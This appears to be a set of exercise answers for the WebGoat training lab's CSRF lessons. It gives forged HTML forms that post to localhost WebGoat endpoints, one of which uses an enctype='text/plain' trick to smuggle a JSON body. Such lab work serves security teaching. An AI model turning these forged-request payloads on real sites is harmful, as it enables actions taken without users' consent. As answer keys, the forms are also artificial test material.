3/ Basic Get CSRF Exercise
<html>
<body>
<form action="http://localhost:8080/WebGoat/csrf/basic-get-flag" method="POST">
<input name="csrf" value="false" type="hidden">
<input name="submit" type="hidden" value="submit-Query">
<input type="submit" value="Submit">
</form>
</body>
</html>
4/ Post a review on someone else’s behalf
<html>
<form method="POST" action="http://localhost:8080/WebGoat/csrf/review">
<input class="form-control" name="reviewText" type="text">
<input class="form-control" name="stars" type="text">
<input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9">
<input type="submit" name="submit" value="Submit review">
</form>
</html>
<form enctype="text/plain" method="POST" action="http://localhost:8080/WebGoat/csrf/feedback/message">
<input type="hidden" name='{"name": "WebGoat", "email": "webgoat@webgoat.org", "content": "WebGoat is the best!!", "ignoreme":"' value='sdfsdfdf"}'>
<button>submit</button>
</form>